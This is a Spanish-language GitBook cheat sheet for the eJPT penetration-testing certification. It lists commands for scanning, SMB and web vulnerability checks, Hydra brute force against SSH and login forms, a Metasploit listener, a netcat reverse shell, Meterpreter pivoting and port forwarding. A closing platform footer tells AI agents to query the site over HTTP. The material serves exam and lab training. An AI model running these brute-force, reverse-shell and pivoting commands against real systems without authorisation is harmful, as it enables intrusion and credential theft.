> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/useful-resources/certifications/ejpt-certification-practical-guide.md).

# Guía práctica de certificación eJPT

{% hint style="danger" %}
El **eJPT (eLearnSecurity Junior Penetration Tester)** es una certificación de entrada al pentesting propuesta por eLearnSecurity. Valida habilidades fundamentales de pruebas de penetración, incluyendo reconocimiento de vulnerabilidades, explotación y post-explotación. El examen es **práctico** y consiste en comprometer un entorno simulado, lo que la hace ideal para principiantes que desean demostrar sus habilidades de ciberseguridad ofensiva.
{% endhint %}

{% embed url="<https://security.ine.com/certifications/ejpt-certification/>" %}

## Reconocimiento

### **Escaneo de red**

Escaneo de equipos en una red:

```bash
nmap -sn 10.10.10.10/24
arp-scan -l
masscan 10.10.10.10/24 -p1-65535 --rate=10000
```

Escaneo de puertos abiertos en equipos específicos:

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10
rustscan -a 10.10.10.10 --ulimit 5000
```

{% endcode %}

Escaneo de puertos abiertos en varios dispositivos:

{% code overflow="wrap" %}

```bash
nmap --open -sS --min-rate 2000 -p- -n -Pn -vvv 10.10.10.10,20,30,36 -oG allPorts
```

{% endcode %}

Extracción de puertos abiertos:

{% code overflow="wrap" %}

```bash
grep '[0-9]' allPorts | cut -d '/' -f1 | sort -u | xargs | tr ' '  ','
```

{% endcode %}

* Salida de ejemplo : `22,80,135,445,9543,2214`

Escaneo detallado de las versiones de los servicios detectados:

```bash
nmap --open -sCV -p 22,80,135,445,9543,2214 10.10.10.10,20,30,36 -oN targeted
```

**Barrido de ping en una red Linux**

```bash
for i in {1..254} ;do (ping -c 1 192.168.1.$i | grep "bytes from" &) ;done
```

### **Análisis de vulnerabilidades**

Escaneo de vulnerabilidades web con Nikto:

```bash
nikto -url http://website.com
```

Detección de vulnerabilidades SQL con SQLmap:

```bash
sqlmap -r request --dbs
```

Escaneo de vulnerabilidades SMB:

```bash
nmap -p445 --script"smb-vuln-*" 10.10.10.10
enum4linux -a 10.10.10.10
crackmapexec smb 10.10.10.10 --shares
```

## Explotación

#### **Ataque de fuerza bruta con Hydra**

**Panel de inicio de sesión:**

{% code overflow="wrap" %}

```bash
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.10 http-post-form "/admin/admin.php:username=^USER^&password=^PASS^:Incorrect" -t 64 -F
```

{% endcode %}

**Fuerza bruta SSH con Hydra:**

```bash
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10
```

## Metasploit – Pivoting y post-explotación

### Shell inversa de Metasploit

**Usando Metasploit para obtener acceso**

```bash
msfconsole
```

Configuración del listener:

```bash
use multi/handler
set LHOST 10.10.10.10
set LPORT 443
run
```

Envío de una shell inversa con Netcat:

```bash
nc 10.10.10.10 443 -e /bin/bash
```

Sesión en segundo plano:

```bash
sessions
```

### Metasploit a Meterpreter

**Método 1 - Convertir una shell en Meterpreter**

Cargando el módulo de conversión:

```bash
use shell_to_meterpreter
```

Configuración de la sesión y del puerto:

```bash
set LHOST 10.10.10.10
set lport 443
set session 1
```

Interacción con la sesión de Meterpreter:

```bash
sessions -i 2
```

Añadir una ruta para acceder a otro segmento de red:

```bash
route add 192.168.100.0/24 2
```

**Método 2 - Usando Highway**

* Cargar el `autoroute` módulo:

```bash
use multi/manage/autoroute
```

Configuración de la sesión y ejecución:

```bash
set session 2
run
```

**Escaneo de red desde Metasploit**

* Escaneo de los puertos de una máquina pivotada:

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.100.21
run
```

### **Redirección de puertos en Metasploit**

* Se añadió un puerto de reenvío para acceder a un servicio remoto:

```bash
sessions -i 2
portfwd add -l 8080 -p 80 -r 192.168.100.21
```

Lista de reglas de redirección:

```bash
portfwd
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/useful-resources/certifications/ejpt-certification-practical-guide.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
